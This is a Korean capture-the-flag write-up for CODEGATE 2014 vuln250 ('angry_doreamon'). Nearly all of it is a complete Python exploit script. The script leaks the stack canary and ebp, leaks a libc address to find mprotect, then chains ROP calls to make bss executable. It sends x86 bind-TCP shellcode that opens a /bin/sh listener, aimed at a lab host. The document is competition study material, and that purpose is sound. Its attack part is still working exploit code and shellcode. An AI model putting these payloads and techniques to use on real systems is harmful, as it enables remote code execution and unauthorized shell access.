CODEGATE 2014 vuln250 (angry_doreamon)

해당 문제의 exploit은 3개의 stage로 구성하였다.

 

stage1은 canary와 ebp를 구하는 부분

 

stage2은 write를 사용해 memory leak을 시켜서 mprotect의 주소를 구하는 부분

 

stage3은 mprotect로 bss영역에 실행권한을 준 뒤, bind_tcp쉘코드를 실행시키는 부분이다.

 

 

 

 

 

 

 

 

 

from socket import *

from struct import *

from time import sleep

 

 

p = lambda x : pack("<L", x)

up = lambda x : unpack("<L",x)[0]

 

HOST = "192.168.220.128"

PORT = 8888

 

write_plt = 0x080486e0

write_got = 0x0804b040

read_plt = 0x08048620

freespace = 0x0804b080

 

ppppr=0x080495bc

pr = 0x080495bf

fd = 4

 

 

 

shellcode=("\x31\xc0"+       

            "\x50"+           

            "\x40"+           

            "\x89\xc3"+        

            "\x50"+           

            "\x40"+           

            "\x50"+           

            "\x89\xe1"+       

            "\xb0\x66"+        

            "\xcd\x80"+        

            "\x31\xd2"+      

            "\x52"+            

            "\x66\x68\x13\xd2"+ 

            "\x43"+           

            "\x66\x53"+        

            "\x89\xe1"+       

            "\x6a\x10"+        

            "\x51"+           

            "\x50"+            

            "\x89\xe1"+       

            "\xb0\x66"+        

            "\xcd\x80"+        

            "\x40"+            

            "\x89\x44\x24\x04"+    

            "\x43"+          

            "\x43"+            

            "\xb0\x66"+        

            "\xcd\x80"+       

            "\x83\xc4\x0c"+        

            "\x52"+            

            "\x52"+            

            "\x43"+            

            "\xb0\x66"+        

            "\xcd\x80"+        

            "\x93"+           

            "\x89\xd1"+       

            "\xb0\x3f"+       

            "\xcd\x80"+        

            "\x41"+            

            "\x80\xf9\x03"+        

            "\x75\xf6"+        

            "\x52"+            

            "\x68\x6e\x2f\x73\x68"+    

            "\x68\x2f\x2f\x62\x69"+    

            "\x89\xe3"+        

            "\x52"+            

            "\x53"+            

            "\x89\xe1"+        

            "\xb0\x0b"+       

            "\xcd\x80")

 

 

print "[+]exploit start"

print "[+]stage1"

 

#stage1

 

s=socket()

s.connect((HOST,PORT))

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

 

s.send("4")

s.recv(1024)

s.send("yyyyyyyyyyy")

parse_string=s.recv(1024)

s.close()

sleep(0.1)

 

print "[+]get canary"

canary=""

canary+=chr(0x00)

canary+=(parse_string)[23:26]

 

print "[+]get ebp"

ebp=""

ebp+=(parse_string)[34:38]

 

print "[+]stage2"

#stage2

payload = ""

payload += "a"*10

payload += canary

payload += "a"*8

payload += ebp

payload += p(write_plt)

payload += p(0)

payload += p(fd)

payload += p(write_got)

payload += p(4)

 

print "[+]reconnection"

s=socket()

s.connect((HOST,PORT))

 

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

 

s.send("4")

s.recv(1024)

 

print "[+]send payload"

s.send(payload)

sleep(1)

print "[+]get mprotect@libc"

write_libc=s.recv(4)

 

mprotect=up(write_libc)+0xc9a0

print "[+]mprotect address:%s" %hex(mprotect)

s.close()

 

 

print "[+]preparation payload"

payload = ""

payload += "a"*10

payload += canary

payload += "a"*8

payload += ebp

payload += p(mprotect)

payload += p(ppppr)

payload += p(0x0804b000)

payload += p(0x2000)

payload += p(7)

payload += ebp

payload += p(read_plt)

payload += p(freespace)

payload += p(fd)

payload += p(freespace)

payload += p(len(shellcode))

 

 

 

print "[+]stage3"

#stage3

print "[+]reconnection"

s=socket()

s.connect((HOST,PORT))

 

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

 

s.send("4")

s.recv(1024)

 

print "[+]send payload"

s.send(payload)

sleep(1)

print "[+]send shellcode"

s.send(shellcode)

 

s.close()